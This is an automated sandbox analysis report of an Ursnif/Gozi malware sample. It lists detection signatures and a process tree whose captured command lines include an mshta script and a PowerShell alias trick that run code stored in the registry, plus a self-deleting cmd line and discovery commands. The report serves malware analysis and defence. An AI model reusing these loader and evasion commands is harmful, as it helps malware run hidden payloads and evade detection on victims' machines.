Edit tour
Windows
Analysis Report
Lx6.exe
Overview
General Information
| Sample Name: | Lx6.exe |
| Analysis ID: | 720586 |
| MD5: | 3b892bea0f8cbe0b61ee380743567d1d |
| SHA1: | 90522132e3a97e966e5270a8e105cc33f0d6c4e5 |
| SHA256: | 6b722961edc010c5487de4ef7eee84b586ac3c3f06dbd1920935ea5f7bb90543 |
| Tags: | 185212471331947622560912135074exeGoziOpendirtel12-msn-com |
| Infos: |   |
 | |
Detection
Ursnif
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Uses net.exe to modify the status of services
Machine Learning detection for sample
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Self deletion via cmd or bat file
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Performs a network lookup / discovery via net view
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Drops certificate files (DER)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Queries the current domain controller via net
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Sample file is different than original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Classification
- System is w10x64
Lx6.exe (PID: 1172 cmdline: C:\Users\u ser\Deskto p\Lx6.exe MD5: 3B892BEA0F8CBE0B61EE380743567D1D) 
control.exe (PID: 3692 cmdline: C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) 
rundll32.exe (PID: 4672 cmdline: "C:\Window s\system32 \rundll32. exe" Shell 32.dll,Con trol_RunDL L -h MD5: 73C519F050C20580F8A62C849D49215A)
mshta.exe (PID: 6016 cmdline: C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Ccqf='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Ccqf).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) 
powershell.exe (PID: 4292 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name wsll uui -value gp; new-a lias -name gwhuthvwu -value ie x; gwhuthv wu ([Syste m.Text.Enc oding]::AS CII.GetStr ing((wsllu ui "HKCU:S oftware\Ap pDataLow\S oftware\Mi crosoft\54 E80703-A33 7-A6B8-CDC 8-873A517C AB0E").Url sReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913) 
conhost.exe (PID: 5672 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 1264 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\iyr5jfx 4.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 1312 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESA4F5.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC AB583CA567 BD44E39E99 32B1B4F9F8 AB.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 1236 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\jxpjpfg v.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 5024 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESB08E.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC F2AAFAB641 0F41F99823 1914A7D0E2 4.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) 
explorer.exe (PID: 3528 cmdline: C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 5656 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\Lx6.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 5948 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - RuntimeBroker.exe (PID: 3124 cmdline:
C:\Windows \System32\ RuntimeBro ker.exe -E mbedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5) - cmd.exe (PID: 5760 cmdline:
cmd /C "wm ic compute rsystem ge t domain | more > C:\ Users\user \AppData\L ocal\Temp\ 9AF9.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 2760 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
WMIC.exe (PID: 5296 cmdline: wmic compu tersystem get domain MD5: EC80E603E0090B3AC3C1234C2BA43A0F)